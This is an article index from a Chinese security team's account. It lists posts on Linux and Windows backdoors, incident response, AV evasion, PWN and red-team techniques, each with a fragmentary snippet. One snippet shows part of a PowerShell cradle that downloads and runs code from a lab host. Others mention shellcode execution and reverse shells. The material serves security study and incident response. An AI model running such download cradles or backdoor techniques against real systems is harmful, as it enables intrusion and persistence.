NOP Team

其他

Electron 安全与你我息息相关

生成的进程中。https://www.electronjs.org/zh/blog/electron-22-0#utilityprocess-api-36089更详细信息参考官网,Electron
4月10日 上午 4:45
其他

远程调试的利用

<u>Team</u>sSignalGoby蚁剑Yakit参考
3月28日 下午 7:05
其他

RCE 遇到受限 shell 的突破

相关的,所以这里要么是通用功能,只不过在这个小摄像头里没有,要么就是系统自带的代理功能,我们尝试修改数据库,看看能不能有意外惊喜覆盖,重启看来并不行,就到这里了这下终于可以睡个好觉了...0x08
3月20日 下午 4:11
其他

服务隐藏与排查 | Windows 应急响应

套件中一款工具https://learn.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suitePsExec64.exe
1月15日 上午 12:10
其他

PowerShell 配置文件后门 | Windows 后门系列

C:\Users\Administrator\Documents\WindowsPowerShell\Microsoft.PowerShell_profile.ps1这些配置文件中都可以类似
1月6日 下午 9:42
其他

计划任务的攻防战 | Window 应急响应

套件中一款工具https://learn.microsoft.com/zh-cn/sysinternals/downloads/sysinternals-suitePsExec64.exe
1月5日 下午 2:26
其他

计划任务执行由谁决定 | Windows 应急响应

NT\CurrentVersion\Schedule\TaskCache\Tree计划任务的具体配置在此位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
1月4日 上午 4:21
其他

JS代码混淆 | js 逆向系列

userName=_0x5665ce(0xc6),greeting=greet(userName),greeting2=greet(person[_0x5665ce(0xcc)]);function
2023年12月20日
其他

JS Hook | js 逆向系列

值中包含字符串"TSdc75a61a",则会触发一个断点调试器,允许开发者在浏览器的调试工具中进行进一步的调试和处理。https://zhuanlan.zhihu.com/p/231651573//
2023年11月29日
其他

参数加密签名 & JS逆向

逆向技术会成为渗透测试工程师与红队检测相关人员的必备技能,所以目前相关文章和视频主要是搞爬虫那帮人在写这件事让我感到十分不安,于是有了这篇文章下面是一些案例可以看到,同样的参数,包重放就会导致
2023年10月15日
其他

Linux 应急响应手册 v1.8

declare小技巧新增文本内容对比方法2021.8.19补充了动态库劫持相关内容v1.12021.7.1解决了上一版本中图片缺失问题增加
2023年8月11日
其他

一次失败的漏洞串联尝试

这篇文章并不是一次成功的漏洞利用,而是一次失败的漏洞串联,主要记录在寻找串联可能性的过程中遇到的困难以及探索思路简单来说可能意义不大,如果你喜欢看探索过程,可以继续观看在一次漏洞挖掘过程中,我发现
2023年7月4日
其他

APT入侵应急响应靶场搭建 & 攻击过程

"44WkyvPxZqyLza3igQM21veKM2C5hWu37a1UShxNyCJRF4xZ4xhyJTgUAfv16P7RNN23KDnCLdVUnTqmbvhAVkdrSvtud7R",
2023年6月27日
自由知乎 自由微博
其他

APT 入侵应急响应已上线 B站

入侵应急响应培训分享一个有趣的ssh后门
2023年6月21日
其他

一次 APT 入侵应急响应培训分享

版本了,内容逐步完善,但是由于保密的要求,做过的应急响应项目没有办法当作案例来给大家展示前一段时间应朋友要求,给某单位录制了一次
2023年6月17日
其他

sudo 后门|Linux 后门系列

/etc/shadow这样可能造成的危害大小主要取决于运维人员具体打开的文件,如果是计划任务文件则攻击者可能新建计划任务、如果是一些开机加载、环境变量等文件,攻击者也可以进行添加内容0x03
2023年6月2日
其他

一个有趣的ssh后门 | Linux 后门系列

中并进行相应的配置,这样访问者可以使用固定的电脑无需输入密码就可以访问到服务器,在一定程度上安全和便利兼得,但是其实这里有一个不常用的参数非常适合用来做后门——command通常运维人员通过
2023年5月25日
其他

Linux 应急响应手册 v1.7

declare小技巧新增文本内容对比方法2021.8.19补充了动态库劫持相关内容v1.12021.7.1解决了上一版本中图片缺失问题增加
2023年4月27日
其他

更新源后门 | Linux 后门系列

文件等全都重新签名,之后在受害服务器中导入我们的签名第二种方法是我测试发现的,只要修改系统上部分文件内容,就可以实现绕过对软件包的校验一、重新签名,导入签名其实呢,这里有一个取巧的方法是直接修改
2023年3月30日
其他

APT是如何杜绝软件包被篡改的

pool/main/a/accountsservice/accountsservice_0.6.45-1ubuntu1.3_amd64.debSize:
2023年2月23日
其他

包管理器到底管理了什么?

似乎在资源访问、权限控制等方面更倾向于交给开发者打包时决定因为在我寻找官方文档中对于程序权限控制问题时,只找到了针对开发者的部分,告诉开发者如何配置权限和资源访问当然了,也提到了flatpak
2023年2月11日
其他

Linux 应急响应手册 v1.6

https://pan.baidu.com/s/1R6VW-ydG7oGyW95cbyMG8g?pwd=1234
2023年1月6日
其他

如何带走一个“鲜活”的进程 | Linux 应急响应

这一侧再次收到了反弹shell的请求此时便可以继续对该进程进行研究了,但是总感觉有些鸡肋假如说当前这台主机关机了,重启后,保存的进程镜像还能够再次恢复吗?关闭受害主机,Kali
2023年1月6日
其他

不落地执行shell脚本 | Linux 后门系列

提供了一种登录不进入shell,直接执行命令的场景ssh
2022年11月16日
其他

修改后门ctime | Linux 后门系列

Server操作系统默认存在时间同步服务,刚修改完下一秒就会变回正常时间(即使是断网的情况下)快到难以让人分辨到底修改成功没有,也正是这个特性,给我们省了非常多的事,稍后会说,Centos
2022年11月2日
其他

Linux 应急响应手册 v1.5

Qiling框架入门-QilingLab使用阿里云OSS可能存在的两个安全风险与云函数&CDN的对抗
2022年9月29日
其他

Qiling框架入门-QilingLab

这个API,可以hook特定地址。注册的回调将在执行指定地址时被调用。参考文档:https://docs.qiling.io/en/latest/hook/。通过
2022年9月9日
其他

与云函数&CDN的对抗 | 应急响应

/lib/x86_64-linux-gnu/libnss_files-2.27.so......7fe9f5d65000-7fe9f5d66000
2022年7月2日
其他

又一个 Windows 远程下载方法 | 红队攻防

对于很多攻击测试人员来说,只要让我把程序上传到服务器,让我执行,我就能给你一切我们希望把这个事情再向前推进一步,只要能执行命令,就能给你一切对于
2022年6月22日
其他

一个 Linux 权限维持小 tip | Linux 后门系列

GCC_COLORS='error=01;31:warning=01;35:note=01;36:caret=01;32:locus=01:quote=01'#
2022年6月10日
其他

堆溢出 —— unlink | PWN

magicheaphttps://github.com/bash-c/pwn_repo/tree/master/HITCON/hitconTraining_magicheapfastbins
2022年5月15日
其他

2022 年 Ubuntu 16.04 配置 pwn 环境的一些小问题

源代码https://www.python.org/ftp/python/3.6.15/Python-3.6.15.tar.xztar
2022年5月14日
其他

Linux 应急响应手册 v1.4

大家好,我是意大利的猫更新日记:v1.42022.4.30小技巧新增数据恢复章节完善挖矿和远控后门,新增确定程序运行时间章节善后阶段-日志分析新增
2022年4月29日
其他

项目发布说明

(NOP<u>Team</u>)作为项目发布渠道,这样既不需要改变大家的使用习惯,也不会有广告的困扰,同时也不会耽误我们和大家交朋友的热忱这个公众号应该不会再涉及公司项目的问题了,是一个纯粹的团队技术公众号,相信这
2022年4月14日
其他

cdb执行shellcode(免杀) | 红队攻防

@$ip=@$t0"+"\n")outfile.write("g"+"\n")outfile.write("g"+"\n")outfile.write("q")生成shell.wds文件后,将
2022年3月23日
其他

放弃 powershell? 启动 sqlps!| 红队攻防

net.webclient).downloadstring(''http://192.168.80.138:80/a''))"'成功上线,弊端是
2022年3月16日
其他

数据库连接利用工具——Sylas | 红队攻防

PROGRAM功能,允许数据库的超级用户以及pg_read_server_files组中的任何用户执行操作系统命令因此利用这个特性可以做到9.3版本后的任意代码执行,具体代码实现:CREATE
2022年2月16日
其他

从一道 CTF 题看 SROP | PWN

执行栈顶地址的指令这个程序的意思就是将我们输入的内容读入到栈顶,之后执行栈顶地址存储的指令,我们看一下开了哪些防护==================================[*]
2022年2月6日
其他

BROP 攻击技术 | PWN

年提出的,论文和幻灯片在参考资料中。实现这一攻击有两个必要条件:目标程序存在一个栈溢出漏洞,并且我们知道怎样去触发它目标进程在崩溃后会立即重启,并且重启后进程被加载的地址不变,这样即使目标机器开启了
2022年1月28日
其他

MOTD 后门引发的思考 | Linux 后门系列

权限来启动的,所以很适合用来做后门实用部分随着关注我们的朋友越来越多,我们已经开始警觉性的将思考与使用尽可能分为两个方面,因为一部分人的需求就是不需要思考,直接拿过来用,所以先上实用部分motd
2021年12月30日
其他

远程下载的通用替代方案 | 红队攻防

打了这么多的攻防演练了,很多时候我们可以执行命令了,但是没有回显、也不交互、添加加用户远程桌面没开、想远程下载木马有杀软拦截、循环写入遇到负载均衡、或者目标根本不出网当然了,一部分兄弟应该是有方法可以上线cs的,比如
2021年12月22日
其他

浅谈 Windows Syscall

<u>Team</u>s。其具体含义是先解析
2021年12月16日
其他

学完ELF人间清醒的总结 | Linux 二进制

链接过程中需要说明的细节【重定位说明】【符号和符号表说明】【初始化和终止例程】【地址无关代码】【延迟绑定】静态链接过程动态链接过程装载时链接
2021年10月21日
其他

Windows defender bypass | 免杀

默认存在一些排除项,在实时检测过程中会忽略这些排除项,但是主动扫描的时候不会排除。这就给
2021年6月6日
其他

LD_PRELOAD 劫持 PWD 为什么失败了 | Linux 后门系列

https://blog.csdn.net/zyt157376/article/details/85371911这里提一点:默认情况编译器会自作聪明将只有一个字符串参数的printf替换成puts
2021年6月3日
其他

SSH Config 后门 | Linux 后门系列

aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-cbc,3des-cbc#
2021年5月25日
其他

自建虚拟专用网络 | 奇怪的知识又增加了

"https://api.godaddy.com/v1/domains/${mydomain}/records/A/${myhostname}"`gdip=`echo
2021年2月11日
其他

Sqlmap使用中遇到的一个小破问题

修改之路,哎,都因为这破网,不然也不会掌握一门技能,在这里我就不写怎么修改,新增了,因为有一片文章写的贼好,我附上,如果哪天无聊,我想写再写出来吧,可以参考
2020年12月29日
其他

三进三出 | 渗透测试

从我这张全是马赛克的图里,老司机们应该能迅速反应过来,代码的后端逻辑其实是先将上传的文件重命名为x.tmp存在缓存文件夹中,再重命名为我们之前filename设定的名字移动到指定的web目录下。
2020年8月5日